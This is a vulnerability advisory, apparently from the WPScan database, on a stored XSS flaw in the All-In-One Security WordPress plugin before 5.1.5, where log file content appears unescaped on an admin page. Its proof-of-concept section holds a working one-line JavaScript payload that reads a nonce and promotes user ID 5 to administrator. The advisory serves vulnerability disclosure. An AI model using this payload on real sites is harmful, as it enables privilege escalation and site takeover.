Lucene search

K
wpvulndbBartłomiej MarekWPVDB-ID:8248B550-6485-4108-A701-8446FFA35F06
HistoryMar 20, 2023 - 12:00 a.m.

All-In-One Security (AIOS) < 5.1.5 - Admin+ Stored XSS

2023-03-2000:00:00
Bartłomiej Marek
wpscan.com
13
security vulnerability
xss
admin privileges
log files
malicious code
authorization
javascript
plugin vulnerability
privilege escalation
host system logs

EPSS

0.001

Percentile

23.5%

The plugin does not escape the content of log files before outputting it to the plugin admin page, allowing an authorized user (admin+) to plant bogus log files containing malicious JavaScript code that will be executed in the context of any administrator visiting this page.

PoC

Just create a test.pdf file with JavaScript content (necessarily in one line) and display the file in the Host system logs. An example of a JavaScript payload increasing the privileges of a user with ID 5 Oneliner: fetch(“https:///wp-admin/users.php?update=promote”).then(function(response) {return response.text()}).then(function(html) {var parser = new DOMParser();var doc = parser.parseFromString(html, “text/html”);return doc.querySelector(“#_wpnonce”).value;}).then(function(nonce) {fetch(“https:///wp-admin/users.php?s=&_wpnonce=” + nonce + “&_wp_http_referer=%2Fwp-admin%2Fusers.php&action;=-1&new;_role=administrator&changeit;=Zmie%C5%84&paged;=1&users;%5B%5D=5&action2;=-1&new;_role2=administrator”).then(function(response) {console.log(response.text());}).catch(function(err) {console.log('Failed to fetch page: ', err); });}).catch(function(err) {console.log('Failed to fetch page: ', err);}); Replace values with <> signs.

EPSS

0.001

Percentile

23.5%

Related for WPVDB-ID:8248B550-6485-4108-A701-8446FFA35F06